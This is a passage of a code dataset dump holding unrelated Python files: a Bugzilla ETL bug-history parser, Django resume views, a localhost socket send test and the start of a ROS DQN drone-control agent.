uncertain = False\n if added in ('? ?', '?'):\n uncertain = True\n Log.note('PROBLEM Encountered uncertain added value. Skipping.')\n row_in.new_value = Null\n elif added != None and added.startswith('? '):\n uncertain = True\n row_in.new_value = added[2:]\n if removed in ('? ?', '?'):\n uncertain = True\n Log.note('PROBLEM Encountered uncertain removed value. Skipping.')\n row_in.old_value = Null\n elif removed != None and removed.startswith('? '):\n uncertain = True\n row_in.old_value = removed[2:]\n if uncertain and self.currBugState.uncertain == None:\n Log.note('PROBLEM Setting this bug to be uncertain.')\n self.processBugsActivitiesTableItem(struct.wrap({'modified_ts': row_in.modified_ts, \n 'modified_by': row_in.modified_by, \n 'field_name': 'uncertain', \n 'new_value': Null, \n 'old_value': '1', \n 'attach_id': Null}))\n if row_in.new_value == None and row_in.old_value == None:\n Log.note('Nothing added or removed. Skipping update.')\n return\n new_value = CNV.value2int(row_in.new_value) if row_in.field_name.endswith('_ts') else row_in.new_value\n if row_in._merge_order == 1:\n self.processSingleValueTableItem(row_in.field_name, new_value)\n elif row_in._merge_order == 2:\n self.processMultiValueTableItem(row_in.field_name, new_value)\n elif row_in._merge_order == 7:\n self.processAttachmentsTableItem(row_in)\n elif row_in._merge_order == 8:\n self.processFlagsTableItem(row_in)\n elif row_in._merge_order == 9:\n self.processBugsActivitiesTableItem(row_in)\n else:\n Log.warning(\"Unhandled merge_order: '\" + row_in._merge_order + \"'\")\n except Exception as e:\n Log.warning('Problem processing row: {{row}}', {'row': row_in}, e)\n\n finally:\n if row_in._merge_order > 1 and self.currBugState.created_ts == None:\n Log.note('PROBLEM expecting a created_ts (did you install the timezone database into your MySQL instance?)')\n for b in self.currBugState.blocked:\n if isinstance(b, basestring):\n Log.note('PROBLEM error')\n\n self.prev_row = row_in\n\n return\n\n @staticmethod\n def uid(bug_id, modified_ts):\n if modified_ts == None:\n Log.error('modified_ts can not be Null')\n return unicode(bug_id) + '_' + unicode(modified_ts)[0:-3]\n\n def startNewBug(self, row_in):\n self.prevBugID = row_in.bug_id\n self.bugVersions = []\n self.bugVersionsMap = Struct()\n self.currActivity = Struct()\n self.currBugAttachmentsMap = Struct()\n self.currBugState = Struct(_id=BugHistoryParser.uid(row_in.bug_id, row_in.modified_ts), bug_id=row_in.bug_id, modified_ts=row_in.modified_ts, modified_by=row_in.modified_by, reported_by=row_in.modified_by, attachments=[])\n for f in MULTI_FIELDS:\n self.currBugState[f] = set([])\n\n self.currBugState.flags = []\n if row_in._merge_order != 1:\n Log.warning('Current bugs table record not found for bug_id: {{bug_id}} (merge order should have been 1, but was {{start_time}})', row_in)\n\n def processSingleValueTableItem(self, field_name, new_value):\n self.currBugState[field_name] = new_value\n\n def processMultiValueTableItem(self, field_name, new_value):\n if field_name in NUMERIC_FIELDS:\n new_value = int(new_value)\n try:\n self.currBugState[field_name].add(new_value)\n return Null\n except Exception as e:\n Log.warning('Unable to push {{value}} to array field {{start_time}} on bug {{curr_value}} current value: {{curr_value}}', {'value': new_value, \n 'field': field_name, \n 'bug_id': self.currBugID, \n 'curr_value': self.currBugState[field_name]}, e)\n\n def processAttachmentsTableItem(self, row_in):\n currActivityID = BugHistoryParser.uid(self.currBugID, row_in.modified_ts)\n if currActivityID != self.prevActivityID:\n self.prevActivityID = currActivityID\n self.currActivity = Struct(_id=currActivityID, modified_ts=row_in.modified_ts, modified_by=row_in.modified_by, changes=[\n {'field_name': 'attachment_added', \n 'attach_id': row_in.attach_id}])\n self.bugVersions.append(self.currActivity)\n self.bugVersionsMap[currActivityID] = self.currActivity\n att = self.currBugAttachmentsMap[unicode(row_in.attach_id)]\n if att == None:\n att = {'attach_id': row_in.attach_id, 'modified_ts': row_in.modified_ts, \n 'created_ts': row_in.created_ts, \n 'modified_by': row_in.modified_by, \n 'flags': []}\n self.currBugAttachmentsMap[unicode(row_in.attach_id)] = att\n att['created_ts'] = Math.min([row_in.modified_ts, att['created_ts']])\n if row_in.field_name == 'created_ts' and row_in.new_value == None:\n pass\n else:\n att[row_in.field_name] = row_in.new_value\n return\n\n def processFlagsTableItem(self, row_in):\n flag = self.makeFlag(row_in.new_value, row_in.modified_ts, row_in.modified_by)\n if row_in.attach_id != None:\n if self.currBugAttachmentsMap[unicode(row_in.attach_id)] == None:\n Log.note('Unable to find attachment {{attach_id}} for bug_id {{bug_id}}', {'attach_id': row_in.attach_id, \n 'bug_id': self.currBugID})\n else:\n if self.currBugAttachmentsMap[unicode(row_in.attach_id)].flags == None:\n Log.error('should never happen')\n self.currBugAttachmentsMap[unicode(row_in.attach_id)].flags.append(flag)\n else:\n self.currBugState.flags.append(flag)\n return\n\n def processBugsActivitiesTableItem(self, row_in):\n if self.currBugState.created_ts == None:\n Log.error('must have created_ts')\n if row_in.field_name == 'flagtypes_name':\n row_in.field_name = 'flags'\n multi_field_new_value = self.getMultiFieldValue(row_in.field_name, row_in.new_value)\n multi_field_old_value = self.getMultiFieldValue(row_in.field_name, row_in.old_value)\n currActivityID = BugHistoryParser.uid(self.currBugID, row_in.modified_ts)\n if currActivityID != self.prevActivityID:\n self.currActivity = self.bugVersionsMap[currActivityID]\n if self.currActivity == None:\n self.currActivity = Struct(_id=currActivityID, modified_ts=row_in.modified_ts, modified_by=row_in.modified_by, changes=[])\n self.bugVersions.append(self.currActivity)\n self.prevActivityID = currActivityID\n if row_in.attach_id != None:\n attachment = self.currBugAttachmentsMap[unicode(row_in.attach_id)]\n if attachment == None:\n Log.note('PROBLEM Unable to find attachment {{attach_id}} for bug_id {{start_time}}: {{start_time}}', {'attach_id': row_in.attach_id, \n 'bug_id': self.currBugID, \n 'attachments': self.currBugAttachmentsMap})\n self.currActivity.changes.append({'field_name': row_in.field_name, \n 'new_value': row_in.new_value, \n 'old_value': row_in.old_value, \n 'attach_id': row_in.attach_id})\n elif row_in.field_name in MULTI_FIELDS:\n total = attachment[row_in.field_name]\n total = self.removeValues(total, multi_field_new_value, 'added', row_in.field_name, 'attachment', attachment, row_in.modified_ts)\n total = self.addValues(total, multi_field_old_value, 'removed attachment', row_in.field_name, attachment)\n attachment[row_in.field_name] = total\n else:\n attachment[row_in.field_name] = row_in.old_value\n self.currActivity.changes.append({'field_name': row_in.field_name, \n 'new_value': row_in.new_value, \n 'old_value': row_in.old_value, \n 'attach_id': row_in.attach_id})\n elif row_in.field_name in MULTI_FIELDS:\n total = self.currBugState[row_in.field_name]\n total = self.removeValues(total, multi_field_new_value, 'added', row_in.field_name, 'currBugState', self.currBugState, row_in.modified_ts)\n total = self.addValues(total, multi_field_old_value, 'removed bug', row_in.field_name, self.currBugState)\n self.currBugState[row_in.field_name] = total\n else:\n self.currBugState[row_in.field_name] = row_in.old_value\n self.currActivity.changes.append({'field_name': row_in.field_name, \n 'new_value': row_in.new_value, \n 'old_value': row_in.old_value, \n 'attach_id': row_in.attach_id})\n return\n\n def populateIntermediateVersionObjects(self):\n self.bugVersions = Q.sort(self.bugVersions, [{'field': 'modified_ts', 'sort': -1}])\n prevValues = {}\n currVersion = Null\n nextVersion = Struct(_id=self.currBugState._id, changes=[])\n flagMap = {}\n self.bug_version_num = 1\n while self.bugVersions or nextVersion != None:\n try:\n currVersion = nextVersion\n if self.bugVersions:\n try:\n nextVersion = self.bugVersions.pop()\n except Exception as e:\n Log.error('problem', e)\n\n else:\n nextVersion = Null\n if DEBUG_STATUS:\n Log.note('Populating JSON for version {{id}}', {'id': currVersion._id})\n mergeBugVersion = False\n if nextVersion != None and currVersion._id == nextVersion._id:\n if DEBUG_STATUS:\n Log.note('Merge mode: activated ' + self.currBugState._id)\n mergeBugVersion = True\n if nextVersion != None:\n if DEBUG_STATUS:\n Log.note('We have a nextVersion: {{timestamp}} (ver {{next_version}})', {'timestamp': nextVersion.modified_ts, \n 'next_version': self.bug_version_num + 1})\n self.currBugState.expires_on = nextVersion.modified_ts\n else:\n if DEBUG_STATUS:\n Log.note('Last bug_version_num = {{version}}', {'version': self.bug_version_num})\n self.currBugState.expires_on = MAX_TIME\n for propName, propValue in currVersion.items():\n self.currBugState[propName] = propValue\n\n changes = Q.sort(currVersion.changes, ['attach_id', 'field_name', {'field': 'old_value', 'sort': -1}, 'new_value'])\n currVersion.changes = changes\n self.currBugState.changes = changes\n for c, change in enumerate(changes):\n if c + 1 < len(changes):\n next = changes[(c + 1)]\n if change.attach_id == next.attach_id and change.field_name == next.field_name and change.old_value != None and next.old_value == None:\n next.old_value = change.old_value\n changes[c] = Null\n continue\n if change.new_value == None and change.old_value == None and change.field_name != 'attachment_added':\n changes[c] = Null\n continue\n if DEBUG_CHANGES:\n 'Processing change: ' + CNV.object2JSON(change)\n target = self.currBugState\n targetName = 'currBugState'\n attach_id = change.attach_id\n if attach_id != None:\n if change.field_name == 'attachment_added':\n att = self.currBugAttachmentsMap[unicode(attach_id)]\n self.currBugState.attachments.append(att)\n continue\n else:\n target = self.currBugAttachmentsMap[unicode(attach_id)]\n targetName = 'attachment'\n if target == None:\n Log.warning('Encountered a change to missing attachment for bug {{bug_id}}: {{change}}', {'bug_id': self.currBugState['bug_id'], \n 'change': change})\n target = self.currBugState\n targetName = 'currBugState'\n if change.field_name == 'flags':\n self.processFlagChange(target, change, currVersion.modified_ts, currVersion.modified_by)\n elif change.field_name in MULTI_FIELDS:\n a = target[change.field_name]\n multi_field_value = BugHistoryParser.getMultiFieldValue(change.field_name, change.new_value)\n multi_field_value_removed = BugHistoryParser.getMultiFieldValue(change.field_name, change.old_value)\n a = self.removeValues(a, multi_field_value_removed, 'removed', change.field_name, targetName, target, currVersion.modified_ts)\n a = self.addValues(a, multi_field_value, 'added', change.field_name, target)\n target[change.field_name] = a\n else:\n if target[change.field_name] != change.new_value:\n self.setPrevious(target, change.field_name, target[change.field_name], currVersion.modified_ts)\n target[change.field_name] = change.new_value\n\n self.currBugState.bug_version_num = self.bug_version_num\n if not mergeBugVersion:\n self.bug_version_num += 1\n if self.currBugState.expires_on >= self.settings.start_time:\n state = normalize(self.currBugState)\n if state.blocked != None and len(state.blocked) == 1 and 'Null' in state.blocked:\n Log.note(\"ERROR: state.blocked has 'Null'! Programming error!\")\n if DEBUG_STATUS:\n Log.note('Bug {{bug_state.bug_id}} v{{bug_state.bug_version_num}} (id = {{bug_state.id}})', {'bug_state': state})\n self.output.add({'id': state.id, 'value': state})\n elif DEBUG_STATUS:\n Log.note('Not outputting {{_id}} - it is before self.start_time ({{start_time|datetime}})', {'_id': self.currBugState._id, \n 'start_time': self.settings.start_time})\n elif DEBUG_STATUS:\n Log.note('Merging a change with the same timestamp = {{bug_state._id}}: {{bug_state}}', {'bug_state': currVersion})\n finally:\n if self.currBugState.blocked == None:\n Log.note('expecting a created_ts')\n\n return\n\n def findFlag(self, flag_list, flag):\n for f in flag_list:\n if f.value == flag.value:\n return f\n if f.request_type == flag.request_type and f.request_status == flag.request_status and self.alias(f.requestee) == self.alias(flag.requestee):\n Log.note(\"Using bzAliases to match change '\" + flag.value + \"' to '\" + f.value + \"'\")\n return f\n\n return Null\n\n def processFlagChange(self, target, change, modified_ts, modified_by, reverse=False):\n if target.flags == None:\n Log.note(\"PROBLEM processFlagChange called with unset 'flags'\")\n target.flags = []\n addedFlags = BugHistoryParser.getMultiFieldValue('flags', change.new_value)\n removedFlags = BugHistoryParser.getMultiFieldValue('flags', change.old_value)\n if reverse:\n addedFlags, removedFlags = removedFlags, addedFlags\n for flagStr in removedFlags:\n if flagStr == '':\n continue\n removed_flag = BugHistoryParser.makeFlag(flagStr, modified_ts, modified_by)\n existingFlag = self.findFlag(target.flags, removed_flag)\n if existingFlag != None:\n existingFlag['previous_modified_ts'] = existingFlag['modified_ts']\n existingFlag['modified_ts'] = modified_ts\n if existingFlag['modified_by'] != modified_by:\n existingFlag['previous_modified_by'] = existingFlag['modified_by']\n existingFlag['modified_by'] = modified_by\n existingFlag['previous_status'] = removed_flag['request_status']\n existingFlag['request_status'] = 'd'\n existingFlag['previous_value'] = flagStr\n existingFlag['value'] = Null\n duration_ms = existingFlag['modified_ts'] - existingFlag['previous_modified_ts']\n existingFlag['duration_days'] = math.floor(duration_ms / 86400000.0)\n else:\n Log.warning('Did not find a corresponding flag for removed value {{removed}} in {{existing}}', {'removed': flagStr, \n 'existing': target.flags})\n\n for flagStr in addedFlags:\n if flagStr == '':\n continue\n added_flag = self.makeFlag(flagStr, modified_ts, modified_by)\n candidates = [ element for element in target.flags if element['value'] == None and added_flag['request_type'] == element['request_type'] and added_flag['request_status'] != element['previous_status']\n ]\n if not candidates:\n target.flags.append(added_flag)\n continue\n chosen_one = candidates[0]\n if len(candidates) > 1:\n if DEBUG_STATUS:\n Log.note('Matched added flag {{flag}} to multiple removed flags {{candidates}}. Using the best.', {'flag': added_flag, \n 'candidates': candidates})\n matched_ts = [ element for element in candidates if added_flag.modified_ts == element.modified_ts\n ]\n if len(matched_ts) == 1:\n Log.note('Matching on modified_ts fixed it')\n chosen_one = matched_ts[0]\n else:\n Log.note('Matching on modified_ts left us with {{num}} matches', {'num': len(matched_ts)})\n matched_req = [ element for element in candidates if element['requestee'] != None and added_flag['modified_by'].lower() == element['requestee'].lower()\n ]\n if len(matched_req) == 1:\n Log.note('Matching on requestee fixed it')\n chosen_one = matched_req[0]\n else:\n Log.warning('Matching on requestee left us with {{num}} matches. Skipping match.', {'num': len(matched_req)})\n chosen_one = Null\n elif DEBUG_STATUS:\n Log.note('Matched added flag {{added}} to removed flag {{removed}}', {'added': added_flag, \n 'removed': chosen_one})\n if chosen_one != None:\n for f in ['value', 'request_status', 'requestee']:\n chosen_one[f] = nvl(added_flag[f], chosen_one[f])\n\n return\n\n def setPrevious(self, dest, aFieldName, aValue, aChangeAway):\n if dest['previous_values'] == None:\n dest['previous_values'] = {}\n pv = dest['previous_values']\n vField = aFieldName + '_value'\n caField = aFieldName + '_change_away_ts'\n ctField = aFieldName + '_change_to_ts'\n ddField = aFieldName + '_duration_days'\n pv[vField] = aValue\n if pv[caField] != None:\n pv[ctField] = pv[caField]\n else:\n pv[ctField] = dest['created_ts']\n pv[caField] = aChangeAway\n try:\n duration_ms = pv[caField] - pv[ctField]\n except Exception as e:\n Log.error('', e)\n\n pv[ddField] = math.floor(duration_ms / 86400000.0)\n return\n\n @staticmethod\n def makeFlag(flag, modified_ts, modified_by):\n flagParts = Struct(modified_ts=modified_ts, modified_by=modified_by, value=flag)\n matches = FLAG_PATTERN.match(flag)\n if matches:\n flagParts.request_type = matches.group(1)\n flagParts.request_status = matches.group(2)\n if matches.start(3) != -1 and len(matches.group(3)) > 2:\n flagParts.requestee = matches.group(3)[1:-1]\n return flagParts\n\n def addValues(self, total, add, valueType, field_name, target):\n if not add:\n return total\n else:\n if field_name == 'flags':\n for v in add:\n total.append(BugHistoryParser.makeFlag(v, target.modified_ts, target.modified_by))\n\n if valueType != 'added':\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': Null, \n 'old_value': (', ').join(Q.sort(add)), \n 'attach_id': target.attach_id})\n else:\n Log.error('programming error')\n return total\n diff = add - total\n removed = total & add\n if removed:\n Log.note('PROBLEM: Found {{type}}({{bug_id}}).{{field_name}} value: (Removing {{removed}} can not result in {{existing}})', {'bug_id': target.bug_id, \n 'type': valueType, \n 'field_name': field_name, \n 'removed': removed, \n 'existing': target[field_name]})\n if valueType != 'added' and diff:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': Null, \n 'old_value': (', ').join(map(unicode, Q.sort(diff))), \n 'attach_id': target.attach_id})\n return total | add\n\n def removeValues(self, total, remove, valueType, field_name, arrayDesc, target, timestamp):\n if field_name == 'flags':\n removeMe = []\n for v in remove:\n flag = BugHistoryParser.makeFlag(v, 0, 0)\n found = self.findFlag(total, flag)\n if found != None:\n removeMe.append(found.value)\n else:\n Log.note('PROBLEM Unable to find {{type}} FLAG: {{object}}.{{field_name}}: (All {{missing}}' + ' not in : {{existing}})', {'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': v, \n 'existing': total})\n\n total = [ a for a in total if a.value not in removeMe ]\n if valueType == 'added' and removeMe:\n try:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': (', ').join(Q.sort(removeMe)), \n 'old_value': Null, \n 'attach_id': target.attach_id})\n except Exception as email:\n Log.error('problem', email)\n\n return total\n if field_name == 'keywords':\n diff = remove - total\n output = total - remove\n if valueType == 'added' and remove:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': (', ').join(map(unicode, Q.sort(remove))), \n 'old_value': Null, \n 'attach_id': target.attach_id})\n if diff - KNOWN_MISSING_KEYWORDS:\n Log.note('PROBLEM Unable to find {{type}} KEYWORD {{object}}({{bug_id}}) (adding anyway): (All {{missing}}' + ' not in : {{existing}})', {'bug_id': target.bug_id, \n 'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': diff, \n 'existing': total})\n for d in diff:\n KNOWN_MISSING_KEYWORDS.add(d)\n\n return output\n if field_name == 'cc':\n map_total = struct.inverse({t:self.alias(t) for t in total})\n map_remove = struct.inverse({r:self.alias(r) for r in remove})\n c_total = set(map_total.keys())\n c_remove = set(map_remove.keys())\n removed = c_total & c_remove\n diff = c_remove - c_total\n output = c_total - c_remove\n if not target.uncertain:\n if diff:\n Log.note('PROBLEM: Unable to find CC:\\n{{missing|indent}}\\nnot in:\\n{{existing|indent}}\\nalias info:\\n{{candidates|indent}}', {'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': Q.sort(Q.map(diff, map_remove)), \n 'existing': Q.sort(total), \n 'candidates': {d:self.aliases.get(d, None) for d in diff}})\n else:\n for lost in diff:\n best_score = 0.3\n best = Null\n for found in output:\n score = Math.min([\n strings.edit_distance(found, lost),\n strings.edit_distance(found.split('@')[0], lost.split('@')[0]),\n strings.edit_distance(map_total[found][0], lost),\n strings.edit_distance(map_total[found][0].split('@')[0], lost.split('@')[0])])\n if score < best_score:\n best = found\n\n if best != Null:\n Log.note('UNCERTAIN ALIAS FOUND: {{lost}} == {{found}}', {'lost': lost, \n 'found': best})\n removed.add(best)\n output.discard(best)\n else:\n Log.note('PROBLEM Unable to pattern match {{type}} value: {{object}}.{{field_name}}: ({{missing}}' + ' not in : {{existing}})', {'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': lost, \n 'existing': total})\n\n if valueType == 'added':\n try:\n if removed - set(map_total.keys()):\n Log.error('problem with alias finding:\\n' + 'map_total={{map_total}}\\n' + 'map_remove={{map_remove}}\\n' + 'c_total={{c_total}}\\n' + 'c_remove={{c_remove}}\\n' + 'removed={{removed}}\\n' + 'diff={{diff}}\\n' + 'output={{output}}\\n', {'map_total': map_total, \n 'c_total': c_total, \n 'map_remove': map_remove, \n 'c_remove': c_remove, \n 'removed': removed, \n 'diff': diff, \n 'output': output})\n final_removed = Q.map(removed, map_total)\n if final_removed:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': (', ').join(map(unicode, Q.sort(final_removed))), \n 'old_value': Null, \n 'attach_id': target.attach_id})\n except Exception as email:\n Log.error('issues', email)\n\n return Q.map(output, map_total)\n else:\n removed = total & remove\n diff = remove - total\n output = total - remove\n if valueType == 'added' and removed:\n self.currActivity.changes.append({'field_name': field_name, \n 'new_value': (', ').join(map(unicode, Q.sort(removed))), \n 'old_value': Null, \n 'attach_id': target.attach_id})\n if diff:\n Log.note('PROBLEM Unable to find {{type}} value in {{bug_id}}: {{object}}.{{field_name}}: (All {{missing}}' + ' not in : {{existing}})', {'bug_id': target.bug_id, \n 'type': valueType, \n 'object': arrayDesc, \n 'field_name': field_name, \n 'missing': diff, \n 'existing': total})\n return output\n return\n\n @staticmethod\n def getMultiFieldValue(name, value):\n if value == None:\n return set()\n else:\n if name in MULTI_FIELDS:\n if name in NUMERIC_FIELDS:\n return set([ int(s.strip()) for s in value.split(',') if s.strip() != '' ])\n return set([ s.strip() for s in value.split(',') if s.strip() != '' ])\n return {value}\n\n def alias(self, name):\n if name == None:\n return Null\n else:\n return nvl(self.aliases.get(name, Null).canonical, name)\n\n def initializeAliases(self):\n try:\n try:\n alias_json = File(self.settings.alias_file).read()\n except Exception as e:\n alias_json = '{}'\n\n self.aliases = {k:struct.wrap(v) for k, v in CNV.JSON2object(alias_json).items()}\n Log.note('{{num}} aliases loaded', {'num': len(self.aliases.keys())})\n except Exception as e:\n Log.error('Can not init aliases', e)","sub_path":"pycfiles/Bugzilla_ETL-0.3.13353-py2.7/parse_bug_history.py","file_name":"parse_bug_history.py","file_ext":"py","file_size_in_byte":32925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"374029412","text":"from django.shortcuts import get_object_or_404, render_to_response\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.template import RequestContext\r\nfrom django.db.models import get_model\r\nfrom models import Resume, Skill\r\n\r\ndef home(request):\r\n '''\r\n Home page redirects to default resume\r\n '''\r\n \r\n resume = get_object_or_404(Resume, is_default=True)\r\n section = get_object_or_404(resume.sections.all(), is_default=True)\r\n return HttpResponseRedirect(section.get_absolute_url())\r\n\r\n\r\ndef resume(request, resume_slug):\r\n '''\r\n Resume page redirects to default section\r\n '''\r\n \r\n resume = get_object_or_404(Resume, slug=resume_slug)\r\n section = get_object_or_404(resume.sections.all(), is_default=True)\r\n return HttpResponseRedirect(section.get_absolute_url())\r\n\r\n\r\ndef section(request, resume_slug, section_slug):\r\n '''\r\n Section page renders the template with the same name as the section slug\r\n '''\r\n \r\n resume = get_object_or_404(Resume, slug=resume_slug)\r\n section = get_object_or_404(resume.sections.all(), slug=section_slug)\r\n \r\n context = {\r\n 'resume': resume,\r\n 'section': section\r\n }\r\n \r\n return render_to_response([\r\n \"resume/%s/%s.html\" % (resume.slug, section.slug),\r\n \"resume/default/%s.html\" % section.slug\r\n ], {}, context_instance=RequestContext(request, context))\r\n\r\n\r\ndef object(request, resume_slug, section_slug, object_slug):\r\n '''\r\n Object page uses section.model_class to render an object. For example,\r\n if section.model_class is 'resume.Job', a Job with object_slug is found\r\n and put in the 'job' context variable, and the 'job_detail.html'\r\n template is rendered\r\n '''\r\n \r\n resume = get_object_or_404(Resume, slug=resume_slug)\r\n section = get_object_or_404(resume.sections.all(), slug=section_slug)\r\n\r\n if section.model_class == '':\r\n # no specified object class for this section, so throw a 404\r\n raise Http404\r\n\r\n bits = section.model_class.split('.')\r\n model_name, app = bits[-1], '.'.join(bits[:-1])\r\n model = get_model(app, model_name)\r\n\r\n obj = get_object_or_404(model.objects.filter(resume=resume),\r\n slug=object_slug)\r\n object_name = obj.__class__.__name__.lower()\r\n\r\n context = {\r\n 'resume': resume,\r\n 'section': section,\r\n 'object_detail': True\r\n }\r\n context[object_name] = obj\r\n\r\n return render_to_response([\r\n \"resume/%s/%s_detail.html\" % (resume.slug, object_name),\r\n \"resume/default/%s_detail.html\" % object_name,\r\n ], {}, context_instance=RequestContext(request, context))\r\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"109263572","text":"\n# test the server send and recv\nimport socket\nimport logging;\nimport time;\nlogging.getLogger().setLevel(logging.INFO)\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM);\nip_addr = '127.0.0.1';\nip_port = 6689\nserver.bind((ip_addr, ip_port));\nserver.listen();\nlogging.info(\"waiting for connectiong...\");\nconnect, (host, port) = server.accept();\n\nwhile True:\n time.sleep(1)\n\n connect.sendall(b'test')\n logging.info(\"has sent\")\n\n# problem summary,\n# 1. if the client exit, the server sendall will raise error ConnectionResetError: [WinError 10054] An existing connection was forcibly closed by the remote host","sub_path":"Socket-Sever-Client/Test/Test_Sendall/server_test_sendall.py","file_name":"server_test_sendall.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"150569513","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n#Reinforcement Learning related imports\nimport sys\nimport pylab\nimport random\nimport numpy as np\nfrom collections import deque\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.models import Sequential\ntry:\n from env import Environment \nexcept ImportError:\n print(\"import Environment one more check\")\n sys.exit(1)\n\n#ROS related imports\ntry:\n import rospy\nexcept ImportError:\n print(\"Unable to import rospy!\")\n print(\"Please to check it.\")\n sys.exit(1)\n\n# Object detection module imports\nimport std_msgs.msg\nfrom tensorflow_object_detector.msg import MsgState\n\n#Drone Control module imports\nfrom geometry_msgs.msg import PoseStamped \nfrom geometry_msgs.msg import Quaternion\nfrom swarm_ctrl_pkg.srv import srvMultiSetpointLocal, srvMultiSetpointLocalRequest\nfrom sensor_msgs.msg import Image #이미지 캡쳐\n#Max Episode 300\nEPISODES = 20000\n\n#드론의 현재위치를 받아서 저장하는 object \n#gazebo에서 위치를 publishing 때마다 계속 업데이트\nquad_pose=PoseStamped()\n#image_capture\nset_image=Image()\n\ndef poseagentCB(posedata):\n \"\"\"To updateDrone's local position \n \"\"\"\n global quad_pose\n quad_pose=posedata\n\ndef ImageCB(Imagedata):\n \n #rospy.loginfo('I got Image')\n set_image.data =Imagedata.data\n set_image.encoding =Imagedata.encoding\n set_image.header.frame_id =Imagedata.header.frame_id \n set_image.header.seq =Imagedata.header.seq \n set_image.header.stamp.nsecs=Imagedata.header.stamp.nsecs\n set_image.header.stamp.secs =Imagedata.header.stamp.secs \n set_image.height =Imagedata.height \n set_image.is_bigendian =Imagedata.is_bigendian \n set_image.step =Imagedata.step \n set_image.width =Imagedata.width \n\ndef image_capture():\n \n rate = rospy.Rate(10) \n \n \n pub.publish(set_image)\n \n rate.sleep()\nclass DQNAgent:\n \"\"\"Learning Agent\n \"\"\"\n def __init__(self, state_size, action_size):\n \n self.load_model = False\n \n # Define state size and action size(상태와 행동의 크기 정의)\n self.state_size = state_size\n self.action_size = action_size\n\n # DQN Hyperparameter(하이퍼파라미터)\n self.discount_factor = 0.99\n self.learning_rate = 0.001\n self.epsilon = 1.0\n self.epsilon_decay = 0.999\n self.epsilon_min = 0.0001 # q-value 적용 시기\n self.batch_size = 64\n #Minimum learning period(최소 학습 주기)\n self.train_start = 1000 \n #Replay Memory maxlen=2000(리플레이 메모리 최대 2000)\n self.memory = deque(maxlen=2000)\n\n # model:Saving temp weight, target_model=Updating model's weight \n self.model = self.build_model()\n self.target_model = self.build_model()\n self.update_target_model()\n\n self.pose_sub=rospy.Subscriber(\"/camila1/mavros/local_position/pose\",PoseStamped,callback=poseagentCB)\n\n # if self.load_model:\n # self.model.load_weights(\"./save_model/cartpole_dqn_trained.h5\")\n\n # 상태가 입력, 큐함수가 ���력인 인공신경망 생성\n def build_model(self):\n model = Sequential()\n model.add(Dense(24, input_dim=self.state_size, activation='relu',\n kernel_initializer='he_uniform'))\n model.add(Dense(24, activation='relu',\n kernel_initializer='he_uniform'))\n model.add(Dense(self.action_size, activation='linear',\n kernel_initializer='he_uniform'))\n model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate)) #loss 는 mean square equation optimizer는 gradient decent의 방식\n return model\n #수정 필요 아웃풋이 7개일 필요는 없는가?\n\n # 타깃 모델을 모델의 가중치로 업데이트\n def update_target_model(self):\n self.target_model.set_weights(self.model.get_weights())\n\n # 입실론 탐욕 정책으로 행동 선택\n def get_action(self, state):\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.action_size)#해당 범위 내의 인덱스를 랜덤하게 1개 반환한다.\n else:\n q_value = self.model.predict(state)\n return np.argmax(q_value[0])#결과가 [[1,2,3,4,5,7]]의 형태를 가지기 때문이다.\n\n # 샘플 을 리플레이 메모리에 저장\n def append_sample(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n\n # 리플레이 메모리에서 무작위로 추출한 배치로 모델 학습\n def train_model(self):\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n # 메모리에서 배치 크기만큼 무작위로 샘플 추출\n mini_batch = random.sample(self.memory, self.batch_size)\n\n states = np.zeros((self.batch_size, self.state_size))\n next_states = np.zeros((self.batch_size, self.state_size))\n actions, rewards, dones = [], [], []\n\n for i in range(self.batch_size):\n states[i] = mini_batch[i][0]\n actions.append(mini_batch[i][1])\n rewards.append(mini_batch[i][2])\n next_states[i] = mini_batch[i][3]\n dones.append(mini_batch[i][4])\n\n # 현재 상태에 대한 모델의 큐함수\n # 다음 상태에 대한 타깃 모델의 큐함수\n target = self.model.predict(states)\n target_val = self.target_model.predict(next_states)\n\n # 벨만 최적 방정식을 이용한 업데이트 타깃 (배치 모델 업데이트)\n for i in range(self.batch_size):\n if dones[i]:\n target[i][actions[i]] = rewards[i]\n else:\n target[i][actions[i]] = rewards[i] + self.discount_factor * (\n np.amax(target_val[i]))\n\n self.model.fit(states, target, batch_size=self.batch_size,\n epochs=1, verbose=0)\n\n\ndef interpret_action(action):\n scaling_factor = 0.5 #위치 이동값\n if action == 0:\n quad_action = (0, 0, 0)\n elif action == 1:\n quad_action = (scaling_factor, 0, 0)\n elif action == 2:\n quad_action = (0, scaling_factor, 0)\n elif action == 3:\n quad_action = (0, 0 , 0.2)# z값 고정 0.2\n elif action == 4:\n quad_action = (-scaling_factor, 0, 0)\n elif action == 5:\n quad_action = (0, -scaling_factor, 0)\n elif action == 6:\n quad_action = (0, 0, -0.2)\n\n return quad_action\n\n\nif __name__ == \"__main__\":\n \n env = Environment(image_shape=(1280, 720))\n state_size = 3\n action_size = 7\n threshehold_pose = 0.1\n \n\n # DQN 에이전트 생성\n rospy.init_node('DQNAgent', anonymous=False)\n \n \n pub = rospy.Publisher('image_capture',Image,queue_size=10)\n sub = 